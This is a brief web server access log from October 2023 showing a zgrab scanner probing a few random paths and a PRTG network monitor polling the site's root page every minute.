170.64.134.89 - - [01/Oct/2023:12:42:04 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
170.64.134.89 - - [01/Oct/2023:12:42:08 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
170.64.134.89 - - [01/Oct/2023:12:42:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Oct/2023:12:42:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:43:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:44:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:45:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
